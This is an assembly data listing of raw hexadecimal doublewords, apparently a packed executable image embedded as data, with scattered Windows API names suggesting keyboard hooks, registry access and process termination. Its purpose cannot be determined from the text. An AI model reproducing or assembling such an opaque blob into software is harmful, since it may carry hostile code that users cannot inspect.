dd 53C0AFF6h, 0E0FB45F1h, 4DB2D025h, 89C82B08h, 0F7084D5Bh
dd 282C600h, 0F17FA1E2h, 0A3D099FAh, 63E9F17Fh, 0B8FFFFFDh
dd 0C6BDCDADh, 7400D0C2h, 80D3D10Ah, 0CED228F4h, 0DB05C3CDh
dd 418EC81h, 8500D47Eh, 0FFFFFBE8h, 67A04C04h, 0BCEC85C6h
dd 0F4801D00h, 0AD12C6C6h, 3DA14C45h, 387307D0h, 957802D4h
dd 2B12C66Ah, 1D6802D4h, 1E10C8A0h, 0D021BA3Ch, 1CA10113h
dd 0CC12DA60h
dd 85893701h, 8300BCFCh, 0C81114BDh, 80CB8D10h, 90680051h
dd 9E10AD20h, 0A3700811h, 831114B0h, 8901D980h, 1215F485h
dd 0C8114354h, 13229C10h, 2518080h, 275E11D3h, 458B4011h
dd 4810DC0Ch, 85F3D1BCh, 721215F8h, 6474FF11h, 0F08DBB8Dh
dd 685100BCh, 8D00B600h, 6B009503h, 43C05B00h, 0E610DC11h
dd 0DD90E001h, 103C334h, 1181BD83h, 241F7400h, 8D8D006Ah
dd 0B0A301BBh, 0ABA01181h, 73118D40h, 0B31172B0h, 0D0BC30B0h
dd 13AB3C81h, 9C7400B6h, 1172958Bh, 500C8083h, 741447C1h
dd 0F316920Dh, 0F7141801h, 148D1110h, 0F3B0B311h, 2C48A01h
dd 0D3300BA1h, 0DD376839h, 0C481D347h, 500066E4h, 0F0FB90D3h
dd 0E31EC040h, 66DCC008h, 0C7219003h, 66D88583h, 75259000h
dd 75229C21h, 950D8B21h, 953B2175h, 30A22168h, 2274F0FCh
dd 8BE0F7Fh, 750DF983h, 0CE7D91E3h, 1C75298Eh, 76D485C7h
dd 0C5BF0C24h, 14E922C0h, 2274E146h, 1032C0EBh, 0F20C55ABh
dd 239F0CA6h, 0C0143C6h, 11BE0FFFh, 7544FA83h, 1066FE7Ah
dd 148BE0Fh, 0FB4CF983h, 20E66E75h, 242BE0Fh, 5FF8EF83h
dd 112E6275h, 0FDC1830Ch, 8321E503h, 0E85203C2h, 0B0CF5C6Ch
dd 858D40A0h, 1D528DE4h, 499F235h, 0D3711286h, 31398D8Dh
dd 0B64C3627h, 8C42182h, 0F74A442h, 76D43537h, 4CEB3340h
dd 754925FCh, 77360741h, 1335754Eh, 29754636h, 0C67FC0ECh
dd 8B000541h, 61EB6815h, 8310666Eh, 707E04C0h, 725F6248h
dd 10080C89h, 0AACC8083h, 74CABACDh, 0C02B8322h, 0C30D9402h
dd 3778D330h, 7125472Dh, 562650C8h, 0F82859D4h, 20BE7D02h
dd 2DC2C0D9h, 0E0E94141h, 10E8406Fh, 0FFFFE7DFh, 21C18D8Dh
dd 0F4E1E851h, 40A43231h, 30B121C1h, 91E85008h, 66023731h
dd 0BC21BD35h, 418D4D42h, 0E09491E9h, 3747D1h, 11020312h
dd 94801127h, 156A4460h, 0BD2182C4h, 22BC41D0h, 4D8E4CB8h
dd 42E941DFh, 0C056D0E0h, 0D241D095h, 6D448083h, 8B411F12h
dd 6A505209h, 15FF404Fh, 0B3D3BC40h, 4163D011h, 1F958B13h
dd 0E430B141h, 41D010C9h, 3C11B0B3h, 45FC8179h, 0C08DC150h
dd 27C04022h, 384680D1h, 0C06C2073h, 0C06C2679h, 0E1862385h
dd 51681A95h, 73522A3Bh, 0F3A0065Dh, 2EC06C20h, 753C22A5h
dd 360A14Ah, 30165282h, 0F88301BFh, 0BF387521h, 73FE0370h
dd 51BE0F52h, 2DFA8302h, 8F2675FBh, 83044858h, 757B6BF9h
dd 559A014h, 0AB55F883h, 72866D22h, 1F8D3B53h, 81117441h
dd 0C2836F53h, 52828906h, 34CD0CEBh, 4C0EE93Bh, 0CC85C7A0h
dd 5B8F2476h, 417C30E7h, 301958A0h, 0BB307F39h, 61198D8Bh
dd 320AC96Bh, 4C4F8D69h, 4489D001h, 155FA62h, 0AEB96403h
dd 517520DBh, 678902C0h, 0BD4D8152h, 3E86119h, 660AD0F7h
dd 6122708Bh, 9C5869DCh, 9C228561h, 9C958B61h, 953BFB61h
dd 33736119h, 9CE0858Dh, 56B2C195h, 1557E851h, 85B01311h
dd 815124CCh, 24950353h, 0B0640351h, 6218088Bh, 35CD63DCh
dd 0DD37D61Ah, 8228C562h, 8F342109h, 0F062DEC2h, 88272C3Dh
dd 0D5474D07h, 0D550F4E5h, 2C24C5E4h, 0E4450344h, 6622A5EEh
dd 0D1EE1274h, 0F78AE455h, 45663402h, 0E44D0300h, 0D601E988h
dd 0E4F21750h, 45392759h, 0C87243E4h, 0C7BD3DCDh, 2D267D3Ch
dd 0BE7D5798h, 8ECD447h, 595610B8h, 14074640h, 0DA500000h
dd 66609Ah, 277371C6h, 1130E873h, 8510B300h, 313BA9D8h
dd 19E68273h, 8D138692h, 0B058AED8h, 0D8958DEFh, 0E8A6F0F9h
dd 0FF0BDCF1h, 19A642FFh, 83276089h, 22672479h, 67D199CCh
dd 7EBD8122h, 0F00B682h, 0E0387183h, 6660A6D0h, 0D948D00h
dd 0E8E3825Fh, 54517596h, 0F2267F0h, 5FD8CBEh, 0F983815Fh
dd 0D9850F68h, 95E1467Ch, 84BE0F22h, 81C8D915h, 0F74F89Fh
dd 0E146C285h, 0AF0F82A8h, 0DA0D94BEh, 0E4FA81C8h, 0D800AB80h
dd 0C582A922h, 39805C83h, 8FB16731h, 0DD85BFC2h, 2382C8DFh
dd 6196850Fh, 0D4EE076Ah, 15848D83h, 8D50815Fh, 0C4E0718Dh
dd 10A11C43h, 0DD83E894h, 5071F251h, 0F3DD3437h, 958D3451h
dd 8443FEE7h, 90089719h, 46930CE0h, 3CC08B91h, 84078DE1h
dd 5351DF05h, 9246936Ah, 34379A10h, 73974400h, 319492C2h
dd 5160C3E1h, 7CE13C53h, 218B2060h, 81F12280h, 310291A0h
dd 0C323DB5Dh, 82DE8D81h, 9E49F921h, 0DA228F50h, 82FEDD81h
dd 753FF821h, 100D8B37h, 0FC0F64Ch, 172C6895h, 0FC96E0D0h
dd 0C4D911EDh, 99BA9DAAh, 81C891E8h, 3B3E04C4h, 16A0AF0h
dd 4369F3E8h, 4A30E103h, 0E88BA734h, 382A8D4h, 8B60AFC8h
dd 85D63422h, 703D815Fh, 0EB167481h, 7381DE87h, 8170FA81h
dd 0E90520ABh, 3A0166A9h, 98838628h, 9F840F83h, 23DCB1C8h
dd 88A068A3h, 463451D0h, 34AB0CA5h, 1BF2068h, 11B394E0h
dd 35C13353h, 8A126D54h, 8398C482h, 404920ABh, 4492E281h
dd 0B93FE894h, 913332DAh, 0F890E893h, 61F2A96Dh, 0E884B8E1h
dd 75C00833h, 0CD54E921h, 0A80DDB21h, 5FE80106h, 1F75B56Dh
dd 94158BB7h, 4CE8E18Ch, 0AAEBA6Dh, 75EBB37Bh, 0B37BA2A1h
dd 0C6BD7DBCh, 0A22C0D92h, 83D03003h, 0F4600AECh, 10271157h
dd 344A02EDh, 0A12E3D83h, 0BF0A7500h, 0FFD85AE8h, 0A12EA3FFh
dd 31BBF4A1h, 0BC9CC040h, 7D83FCD2h, 101E6AFCh, 38F28DADh
dd 0FC5532BCh, 985DC08Bh, 10A3D0BCh, 3CC029C7h, 8BA7C12Dh
dd 904AFC4Dh, 5708C251h, 15938BC0h, 2F30BC40h, 1069FC50h
dd 0D604C251h, 440DC16Ch, 0DA7CCC47h, 9C4CA1E0h, 1CCCC5Ch
dd 7250158Bh, 8B01E6CCh, 47540D33h, 0A101D9CCh, 0F3CC5C58h
dd 8868F701h, 240B06Bh, 7E0815FFh, 558D70F7h, 8C6852F4h
dd 0FF47F080h, 41AF0015h, 1027A37Fh, 5700FF04h, 529415FFh
dd 0C1D990C1h, 0F7E1F05Ch, 0F70C15FFh, 0F8458970h, 0F87DFF83h
dd 6A187400h, 2EF3E800h, 67F251E0h, 9DE80535h, 0FFFFBFFAh
dd 4B00068h, 35EB344Ah, 2002B0C6h, 0C756D0E0h, 236F92E1h
dd 0D66DE8D1h, 236F214Fh, 0A12476ECh, 1108CE58h, 5F88D8Dh
dd 159219B3h, 0E18C064Ch, 0D19A858Dh, 0E1131069h, 4163107Fh
dd 0F196813h, 9510B3C0h, 4275D19Ah, 7D0ED02Ch, 13850FE2h
dd 0D56C6214h, 9146217Dh, 46228500h, 70D37491h, 1D37E81h
dd 10D58AE3h, 41724E90h, 51F4858Dh, 51D18AB3h, 76A0D1C5h
dd 0ECD5ABD1h, 0FE11BBD3h, 0D4D50843h, 0E116B085h, 93DAE321h
dd 958DE4D0h, 6752E122h, 0D7D576E8h, 74C33863h, 0F2E65A57h
dd 60F0A29Bh, 2B4136C3h, 7384C6F0h, 2176F835h, 5589E36Eh
dd 96C076FCh, 7522728Ah, 17FCF013h, 50E1B1F2h, 3FF1E8E3h
dd 3F3846D3h, 6E905F0h, 0BA21CD5Ch, 415FFD3h, 0A15E028Fh
dd 23306207h, 677DF7A8h, 0A1432A7Dh, 0C0110810h, 0D3B3F249h
dd 185B115Dh, 126CF433h, 820EE445h, 4674FF00h, 514A0388h
dd 5C57F433h, 87D83FFh, 0C70A7603h, 280C6105h, 4D71C6C0h
dd 8C427607h, 0C1E4CDEDh, 0D2565E30h, 0DBBDE2BDh, 1CC2007Ah
dd 0E8453BC7h, 0E423C5h, 6D21C740h, 0D15118B0h, 344BF0F1h
dd 22E1E845h, 0C0F71200h, 110FFCFDh, 7D83F045h, 74DF00F0h
dd 0E9C03307h, 7D8101FAh, 0D403F4BBh, 0F8840F00h, 0CDE4F28Eh
dd 0FC571552h, 6151318Dh, 0D5558DC0h, 0E8502FF8h, 57141069h
dd 0FF4589C0h, 0F47D83F4h, 0B2850F00h, 0EC22C67Ah, 8B092279h
dd 2185EC4Dh, 8BEC4DFFh
dd 553BEC55h, 830FF7F8h, 0EC621E92h, 0FE05E0C1h, 7C83C060h
dd 74001401h, 7BEE5Eh, 7605E2C1h, 104C8BC0h, 33511433h
dd 6891CFF4h, 33A0FF9Ch, 0F433CCF8h, 7C6891DCh, 0F23300E7h
dd 0D3C916E8h, 0B0A462D7h, 36F43314h, 0F9E85041h, 9884B70Eh
dd 50C20305h, 0B7ECDAE8h, 0E9F8A783h, 0FF1B659h, 4C5515FFh
dd 2D3D501Ah, 0A1D77401h, 2C61B2FBh, 7231C261h, 0B034E855h
dd 0BBC0F380h, 7848F8F2h, 0A880C003h, 5868006Ah, 8068FA70h
dd 8925A63h, 0A166C033h, 10656029h, 1908B0A4h, 0E26418D1h
dd 517731ADh, 0A03C4068h, 7224158Bh, 8A173C1h, 33C7D194h
dd 878C0D8Bh, 8A63012h, 0C833F334h, 8815A0C0h, 0C67833AEh
dd 0C0C374EDh, 11DB3D83h, 8A577500h, 58A4C360h, 0A03C3C51h
dd 1BBA0DB5h, 1DC9E029h, 702A1BD9h, 40A416EAh, 7617E880h
dd 680462D6h, 0E8800027h, 0E723460Ah, 0C304158Bh, 0E808A531h
dd 6DBED2B0h, 0EB2D7486h, 0F196A013h, 0A201BB04h, 5C6F196h
dd 0FA1806Fh, 960DBEFBh, 5AF983F1h, 6AEF0C7Dh, 7C5FE803h
dd 0D5EB0442h, 0FEC40638h, 0FF1164C2h, 5158A015h, 68831164h
dd 0CC11F434h, 0C6B60901h, 0A191DC24h, 139914B1h, 0D234C333h
dd 0C109840Fh, 0E40D8B8Bh, 4F8BB198h, 58C44F00h, 0E89DA101h
dd 4D8BD128h, 16C5A4F8h, 15CB8B01h, 0F833AEECh, 113FC579h
dd 58BE3D83h, 36740001h, 1163D83h, 2D74EF00h, 113F3D83h
dd 0FB247400h, 0F1893D83h, 0E81B7500h, 6ED1DDBEh, 58680D27h
dd 6BE8C098h, 80239EE0h, 7C2834E2h, 0E5F0CB15h, 4DBC25Dh
dd 0E878E800h, 3DA1E698h, 0C21B5A04h, 6AF32D3Ch, 0ACD11901h
dd 2874C27Dh, 0B7141BC0h, 8B1AA1D3h, 0E231AA0Dh, 0A2A8904Ah
dd 4731AAD2h, 83D8354h, 1834AB02h, 31EF3CB3h, 31EF3CC6h
dd 31EF36D9h, 5D5447CEh, 369710C2h, 8351B2FEh, 0EE643DE3h
dd 130062C0h, 203D8361h, 75313C1Eh, 0B300A125h, 0BDD21832h
dd 41530832h, 1224551h, 439131E2h, 4A4153C0h, 4FB0D590h
dd 32A5A4E4h, 3842542Ch, 0C04C9C8Dh, 6068010Eh, 0FFF23C3Dh
dd 521828F0h, 964198C1h, 53A11345h, 0DC505441h, 236A31h
dd 2432A58Ah, 8D364254h, 0A3C6C061h, 0AA381042h, 0D741D94Ah
dd 0F18B1145h, 34415315h, 0EB43CCB0h, 0BB006A4Bh, 41C618A1h
dd 0B28F068h, 0FFD703D0h, 0C152F815h, 0C7C02800h, 4146EC05h
dd 283DA2E5h, 681C4254h, 593FD9B0h, 0ADD11151h, 0FF417DDEh
dd 52EC4115h, 90513CC1h, 0FF78E532h, 852008B3h, 1334579h
dd 8BFC0086h, 415B850Ch, 72E49874h, 0C04B13A0h, 5B95048Bh
dd 0A7E8C742h, 8E83B8F1h, 0FC017600h, 0FC7D3781h, 72803797h
dd 3E5D5FBFh, 70843A43h, 8B5119A3h, 50B20C4Dh, 0D0FDC33Ah
dd 0FC7DA1E6h, 0E9057401h, 424E46B5h, 75414760h, 0C401120Dh
dd 6321689Ah, 841571D2h, 10D1A8h, 15FF9706h, 1CC152C0h
dd 611F426Ch, 1E753700h, 50610FA1h, 0FD00968h, 10043D01h
dd 15FFFF00h, 0F9671BD4h, 8B64AF53h, 1287F40Dh, 0BCF23544h
dd 4F01E930h, 19914DC4h, 0EE7868B2h, 22F091C0h, 73B8B034h
dd 316177F1h, 51F9A3C3h, 0E82E6485h, 7780C601h, 855FC0EEh
dd 0CBF17264h, 0B18D89E8h, 4632A581h, 0A64A7442h, 0D8B49C4h
dd 904A512Ch, 5F1AFE4h, 2E425320h, 37523181h, 15407F81h
dd 0B03441D9h, 125EB485h, 0B24198A1h, 4461FDD0h, 0FE77544h
dd 513C0D8Bh, 15FFE02Dh, 0C2153CE8h, 0D746225h, 611F158Bh
dd 434E34E6h, 0CC215h, 7070C000h, 0FB42A355h, 0F0504370h
dd 30E80875h, 0F705h, 8B74DF5Dh, 0CF04244Ch, 60441F7h
dd 0F2BB8037h, 8BFF0F74h, 8B082444h, 37102454h, 79B80289h
dd 4BC30080h, 0EE707A70h, 68FE30B5h, 64705578h, 37F835FFh
dd 7A840681h, 588B2070h, 70FF8B08h, 0FFFE830Ch, 0FF3B2E74h
dd 74242474h, 76348D28h, 0B30C8BFFh, 8244C89h, 0C48FF89h
dd 4B37C83h, 12F77500h, 81D10168h, 0E808B344h, 0F0FDFEh
dd 8B354FFh, 64D3C3EBh, 1B705D8Fh, 0B0F60CF1h, 0C0B933C3h
dd 81376052h, 95047981h, 10FF7571h, 8B0C518Bh, 0EF390C52h
dd 5750851h, 5153F3BBh, 6031CEBBh, 150AEB10h, 89000A84h
dd 8908FF4Bh, 6B890443h, 5BFD590Ch, 43563295h, 43583032h
dd 703030F3h, 0FC714B53h, 760C5D8Bh, 40F750D4h, 850F726Eh
dd 0F6D08482h, 458BD032h, 89F80342h, 8BBFFC43h, 7B8B0C73h
dd 6171B108h, 760C8DFFh, 48F7C83h, 4574FF00h, 6B8D5556h
dd 54DFFF10h, 5E5D048Fh, 0C00B804Bh, 783374EFh, 5380703Ch
dd 0B7BCA9E8h, 56808483h, 0EFDEE853h, 78FE0802h, 8B016A80h
dd 0E8088F44h, 610A617Dh, 43898F04h, 0F980870Ch, 78807008h
dd 8F348B80h, 0B8B5A1EBh, 0BB1CD2E6h, 8315EBF2h, 0FF2F6A81h
dd 0A99EE853h, 0F2BB5D83h, 55FD7560h, 8B087068h, 1C418B29h
dd 418B507Fh, 79E85018h, 95FE84E9h, 8B56573Bh, 4D8B0C75h
dd 7D8B10FFh, 8BC18B08h, 0C603FFD1h, 876FE3Bh, 0FB7F83Bh
dd 277882h, 7185C7F7h, 0C114FF75h, 0E28302E9h, 0F9FF8303h
dd 0F3297208h, 0B724FFA5h, 89467895h, 85BAC7A0h, 0E9FF8371h
dd 830C7204h, 0BF0303E0h, 8524FFC8h, 0F0504590h, 888DAB24h
dd 74909059h, 91780C90h, 9071EAA0h, 0F09071CCh, 0D1239071h
dd 8806FF8Ah, 1468A07h, 1EF4788h, 4802468Ah, 2478890h
dd 3C6835Fh, 924DC783h, 0E79653CCh, 9000498Dh, 1929F96h
dd 2AFC683h, 4E02C783h, 9653A691h, 9390AA90h, 47904846h
dd 0B08C914Eh, 59AA6F99h, 90595C90h, 4C905954h, 0AA449059h
dd 593C9059h, 90593490h, 4491592Ch, 89E48EBFh, 1CE48F44h
dd 20AAE8A0h, 0A01CE8A0h, 0ECA020ECh, 0AAF0A01Ch, 1CF0A020h
dd 0A020F4A0h, 0F8A01CF4h, 0F8A020EAh, 20FCA01Ch, 48DFCA0h
dd 0D1848DBDh, 0F803F003h, 0D4FF9555h, 90599277h, 0B090599Ch
dd 8459159h, 0C95F5E1Fh, 919290C3h, 9396A978h, 0B9A478E0h
dd 0A29A9290h, 8DA57890h, 0FC5F3174h, 0FC397C8Dh, 48249440h
dd 0FD0DDF97h, 55FCA5F3h, 36481090h, 0D9F7A164h, 47C09074h
dd 955C92B7h, 9365F915h, 18916C2Bh, 9074A0E6h, 90ABA1DAh
dd 48A0E628h, 0E670A0E6h, 46FF8AA0h, 88D12303h, 0A4E0347h
dd 4E4F9048h, 0A8D3B691h, 0B419A19Dh, 0EEAF979Ch, 0D0EF8302h
dd 0A8D38C92h, 0B8387890h, 97C290A2h, 0EF8303EEh, 0FA7914Dh
dd 0F0C85A82h, 0E6C4BB2Ah, 0E6AACCA0h, 0A0E6D4A0h, 0E4A0E6DCh
dd 0EAECA0E6h, 0E6F4A0E6h, 0A1DB07A0h, 0AA1C8E44h, 1C1CA020h
dd 0A02018A0h, 14A01C18h, 14A0204Ah, 2010A01Ch, 0CA11BA0h
dd 0C55A020h, 2008A01Ch, 0A01C08A0h, 0A9A02004h, 0DAAB5404h
dd 0A0DB20A3h, 38A0DB28h, 4CA0DB32h, 0A579A1DBh, 0B01D0346h
dd 1920A896h, 28ABAAC2h, 0C4AA90C9h, 40A95158h, 0C35EE058h
dd 81147270h, 2D1157E9h, 85FB1157h, 73C26101h, 8BC82BECh
dd 185C4FFh, 88BE18Bh, 440FF8Bh, 0FFCCC350h, 8B00DC25h
dd 99D18440h, 0B9CDA9CDh, 0D9CDC9CDh, 0CDE9CDh, 0DD09CDF9h
dd 0DD29DD19h, 0DD49DD39h, 0DD69DD59h, 89DD7900h, 0A9DD99DDh
dd 0C9DDB9DDh, 0E0DDD9DDh, 57045FD3h, 0F1140000h, 0D0F122D0h
dd 0D0F132F9h, 53965179h, 0AAA60000h, 5B4E005h, 0E0058AE0h
dd 0CAE005BCh, 0DAE005AAh, 5ECE005h, 0E005F8E0h, 0F254A906h
dd 20E029D0h, 292EE029h, 29AA3CE0h, 0E0294AE0h, 6AE0295Ah
dd 0AA86E029h, 2998E029h
dd 0E029A8E0h, 0C6E029B6h, 66E029AAh, 57EE005h, 0E029FCE0h
dd 55AF12h, 0E0692800h, 4AE0693Eh, 56E069AAh, 52CE069h
dd 0E06972E0h, 0E069AA84h, 0A6E06994h, 69B6E069h, 69AACAE0h
dd 0E069D8E0h, 0F8E069E8h, 0A90EE069h, 0A5E02E56h, 0E0A536E0h
dd 5EE0A54Ah, 56E0A5AAh, 538E005h, 0E029EEE0h, 0E029AAD8h
dd 5CE06962h, 0A5E2D4FDh, 0A5AAD6E0h, 0E0A5B6E0h, 96E0A5A4h
dd 4AC2E0A5h, 0A57CE0A5h, 0E0A588E0h, 41735179h, 4134F120h
dd 0B5D5E020h, 1273F1h, 0D79F910h, 43F504F0h, 49100017h
dd 4F01D7Ch, 191BF5h, 0F02D2110h, 0C6F504CAh, 20CC5020h
dd 82F50450h, 1000672Ch, 4F04D88h, 0A62FE6F5h, 0F05D44B0h
dd 2E33F624h, 4F06DF0h, 0F06DD5F5h, 0F871DB8Dh, 908A37EAh
dd 0F504F08Dh, 3B6FCBh, 0F09DD110h, 0D7E0522Ch, 0E0A56E55h
dd 0FC603414h, 0A5F8F8A5h, 60DA96E0h, 0F8A51800h, 34D1FD42h
dd 5342060h, 50D5E0E0h, 5108D0F1h, 0DDEADDE0h, 0ADDFA00h
dd 2AED1AEDh, 4AED3AEDh, 6AED5AEDh, 0ED7A00EDh, 0ED9AED8Ah
dd 0EDBAEDAAh, 0EDDAEDCAh, 0FAFEEDEAh, 6C0308E7h, 6C727473h
dd 416E65FFh, 2E50000h, 6972FF57h, 72506574h, 61FD7669h
dd 666F112Dh, 53656C69h, 697274DFh, 1025676Eh, 47FF016Dh
dd 69547465h, 7F436B63h, 746E756Fh, 47340000h, 1B2F7E11h
dd 41746E49h, 121D0200h, 797063B7h, 2F91025h, 0F6611270h
dd 6500106Bh, 6D651247h, 61F75070h, 10256874h, 7845007Eh
dd 547469FFh, 61657268h, 1AFE64h, 656C5302h, 0FF007065h
dd 65440057h, 6574656Ch, 103A467Dh, 4A0041h, 0CB109E43h
dd 159C6574h, 3614BB44h, 0CB656310h, 10257373h, 0B41329DFh
dd 0FF880011h, 6F6C4701h, 466C6162h, 656572FFh, 1B0000h
dd 6F6CFF43h, 61486573h, 0E5CE646Eh, 52021810h, 12E3109Fh
dd 0E9FE8100h, 6C6C4114h, 1200636Fh, 0B41147FCh, 7A695311h
dd 0F4340065h, 13B414BBh, 4C11471Ah, 9F747361h, 6F727245h
dd 3B10F472h, 63BF6F22h, 69546C61h, 3A10F36Dh, 3B1D57FCh
dd 5502B018h, 7F616D6Eh, 65695670h, 0E3664F77h, 1D67712h
dd 6C2A7B4Dh, 23215302h, 612254BAh, 6E452199h, 248164h
dd 25996AFDh, 6E696F50h, 47526574h, 282D3520h, 4070208Ah
dd 251F1413h, 682254DAh, 74412599h, 7562103Eh, 0D86574CBh
dd 251F0D11h, 1E42AF5h, 6C754D7Fh, 79426974h, 6FFF10C0h
dd 65646957h, 0FF616843h, 900072h, 646E6946h, 12F8A6h
dd 24156F05h, 137BFF10h, 6970DF6Dh, 2F9D0041h, 0ED654E32h
dd 330678h, 46322F94h, 73FD7269h, 0BB00345Bh, 72695602h
dd 167574DBh, 5B3E0025h, 0CF636F23h, 72646441h, 0FE10D6h
dd 6FFF4C01h, 694C6461h, 0ED617262h, 0CE117672h, 43104800h
dd 70BD6D6Fh, 4E7220FBh, 31706D61h, 0F000D9B4h, 349C11h
dd 6C200525h, 7361EF65h, 20FB4D65h, 0F1000078h, 0D114BB3Fh
dd 231A332h, 0DF696157h, 726F4674h, 6C104053h, 624FFF65h
dd 7463656Ah, 27F9F00h, 6D726554h, 17BF6E69h, 1147247Dh
dd 75646F4Dh, 0E212B36Ch, 112634B3h, 2513FD47h, 4F01E910h
dd 6E657017h, 0A7642BD0h, 15214422h, 10F3FE40h, 4E52454Bh
dd 0FF334C45h, 6C642E32h, 0AC00006Ch, 737702EFh, 74103F70h
dd 0F74166h, 31290021h, 65776F4Ch, 10257275h, 5542792Fh
dd 42817070h, 430015BFh, 586C6C61h, 6F2F4831h, 0D5456B6Fh
dd 21995230h, 47EA2154h, 21996220h, 6F303157h, 9EFE7377h
dd 95004143h, 6C694B01h, 7222532Eh, 20778600h, 0B7409F68h
dd 55005F4Ah, 64524553h, 31A7D745h, 0B17355FBh, 52015B36h
dd 0F8BE6765h, 79654B12h, 51056A00h, 756E7F45h, 6C61566Dh
dd 0E110B775h, 3C510572h, 0C2500E41h, 56444141h, 495041F7h
dd 53574564h, 64FE5F32h, 52022F45h, 6E556C74h, 30317779h
dd 0ED5AFAF8h, 517943E9h, 9A251h, 55708110h, 9C000998h
dd 0A07D0009h, 1BB00009h, 15AD0000h, 79736702h, 66406773h
dd 0F8754B42h, 5DAEF0FDh, 5DCE5DBEh, 84005DDEh, 10AB0067h
dd 6C50F17Ch, 0F16050F1h, 0F12A5450h, 50F14C50h, 3050F140h
dd 802251F9h, 186D107Ch, 66E461h, 6029D010h, 60294411h
dd 61246D18h, 556D3118h, 66D656Dh, 65FC6871h, 6D926D72h
dd 6D85908Ah, 0C5906DB5h, 0E56DD56Dh, 0E880226Dh, 7C096DA9h
dd 60FDAAE0h, 0D060FDD8h, 0FDC860FDh, 0FDAAC060h, 60FDB860h
dd 0A860FDB0h, 0AAA060FDh, 0FD9860FDh, 68FD8468h, 706CFD78h
dd 6860FD52h, 60FD61FDh, 3860FD4Ch, 305560FDh, 0FD1064FDh
dd 60FD0860h, 5360FD00h, 908A64F8h, 91D07091h, 7091C870h
dd 7091C055h, 0B07091B8h, 91A87091h, 91A05570h, 70919870h
dd 88709190h, 80557091h, 91787091h, 70917070h, 55709168h
dd 4C709160h, 913C7091h, 70912C70h, 709118A5h, 2271CD08h
dd 70910080h, 0A635148h, 0F160067Dh, 70F1387Ch, 0D574F130h
dd 1C70F128h, 0F10070F1h, 5462E870h, 802D602Ah, 0B0802DBCh
dd 2DA0802Dh, 2D8C9580h, 802D7880h, 68802D60h, 8FF2F51h
dd 8140312h, 0FF251203h, 315090Ah, 208072Eh, 0A1EF0AF9h
dd 1629874Eh, 0F7330803h, 4C270A14h, 7033489h, 0F20E302h
dd 89688361h, 2F318177h, 282FEF28h, 52E03223h, 79080F20h
dd 74825802h, 5072580h, 0DFA1EF0Eh, 30A0322h, 2386B412h
dd 1412F708h, 2886A71Fh, 78121E03h, 80778AC6h, 0F2081ACh
dd 8DDF1514h, 115168FEh, 1543080Fh, 1E7D0348h, 2D5CA1EFh
dd 68332D33h, 239F750h, 2852E014h, 0EB2F3229h, 901E2325h
dd 0EB93220Eh, 81FF4685h, 0C6164697h, 0FFC7C8C1h, 0CA46CDC6h
dd 0C446CFC8h, 8A16CEFFh, 4F4B5C59h, 0C6E2FF46h, 0C8CDCECBh
dd 84FF46C4h, 0C887468Dh, 0FF8E9787h, 4687468Ah, 0E3E9F7CCh
dd 0F7EAF6FFh, 46EAEEECh, 46C6FFCBh, 8586C6C9h, 0E4FF4647h
dd 46CE8EC6h, 0FF84CBC6h, 86CEC4CEh, 468D8785h, 0E4E8E5FFh
dd 464AE8EBh, 0C3C7FF85h, 87CDCEC2h, 876F4689h, 6647CAC6h
dd 454AE694h, 4689FF90h, 0C5C886C9h, 0CAF7C686h, 9071C6CAh
dd 0C6C48DC1h, 9884C3FBh, 0CC85EC90h, 46FD4A85h, 46C390B5h
dd 0F0A0735h, 4A1F12FFh, 0CDC8C246h, 97C8FFC7h, 0C3C746C7h
dd 0C8FFC987h, 0C4C884CBh, 0FB47CF8Dh, 52E04747h, 27322722h
dd 4069FE6Bh, 2B0A1234h, 0EF031009h, 90B032Bh, 33582D1h
dd 4612F708h, 15808966h, 0F46C6B5Ch, 819D91F4h, 23845628h
dd 0C00B1308h, 8170A419h, 829CA125h, 0A125A01Dh, 15BF0334h
dd 5141309h, 32817703h, 273229EFh, 2750682Ah, 0E0EE3630h
dd 27332152h, 0E0FCh, 3233FB29h, 2A25A25Ah, 76282723h
dd 232AA155h, 3432A263h, 76A17423h, 2C29A07Fh, 28275168h
dd 27827722h, 2D28293Ch, 2520C690h, 0A08FA273h, 242F32EBh
dd 52E02293h, 0FE30272Dh, 120E52E0h, 495C1612h, 1111FF49h
dd 13144811h, 55FF5615h, 130D505Fh, 0EF48130Dh, 490B0905h
dd 124852E0h, 0DC056D0Ch, 0E31007A2h, 0D2030DA3h, 10488F82h
dd 0ACBC0402h, 8055A1D2h, 5357DF57h, 0D617575Eh, 7E6615A5h
dd 3500A2E3h, 152F0566h, 36FF8188h, 3120914h, 0F9031205h
dd 0FF901E02h, 3323990h, 39BF160Bh, 48551046h, 48F2A556h
dd 632535BBh, 3E2348A2h, 0F713A29Bh, 39430A14h, 3F3500B0h
dd 23328F35h, 80A1482Bh
dd 0A0C8900Ah, 50FFF0Bh, 9150914h, 0D6DC1266h, 0BB35DA1h
dd 20580809h, 8DEC1334h, 270082B0h, 22A29B2Bh, 27BB2B29h
dd 22A0742Fh, 922B3023h, 992EDD36h, 222925A3h, 3633A29Bh
dd 52E03EDDh, 0A63E2332h, 0F9252F82h, 69B32337h, 300000B2h
dd 38F020Fh, 22033009h, 0B8A53C92h, 36FF0282h, 11151507h
dd 0F9021409h, 7EB32315h, 140711B0h, 2BED3A03h, 313AB579h
dd 110980ADh, 253A9F15h, 9141413h, 15B0E5A0h, 0B18C0FDDh
dd 51092500h, 0FF120880h, 161F324Bh, 7465C03h, 0A16167Fh
dd 1207050Fh, 49DFC02Eh, 150B4B1Eh, 0A08C01Eh, 20709FFh
dd 708465Dh, 5B03FF0Bh, 44154344h, 34FE6C6Bh, 80714C6h
dd 14036615h, 8234BFFh, 0F020905h, 5C01FF08h, 15070446h
dd 52FD5003h, 0F22C765h, 15091615h, 0C1490F59h, 1212C040h
dd 90B80B9h, 0C5D71A0h, 15C85CA2h, 4B6C6BA3h, 43FBC6C2h
dd 2BA31502h, 4B232B2Fh, 5CC42A3Eh, 56485746h, 0C23DC865h
dd 0A130BFFh, 7160F12h, 4912BF14h, 31E0F0Bh, 0FF04C059h
dd 2081309h, 5B1F1407h, 0C7C444C1h, 0A1B5C064h, 0B346901Ah
dd 1E7B0346h, 55D31E16h, 0D0075756h, 6336E9C2h, 56D42FA2h
dd 50BD237h, 14024F0Fh, 0D95510h, 41200012h, 85B8CCB1h
dd 3A5CA06Eh, 0A1D252E0h, 95F0C39h, 3914030Dh, 0A125B647h
dd 685CCD10h, 88646150h, 25004AD1h, 9325DD63h, 0E8600030h
dd 0B966F1A5h, 68280077h, 8D11A0C7h, 0FF6006BDh, 243C0300h
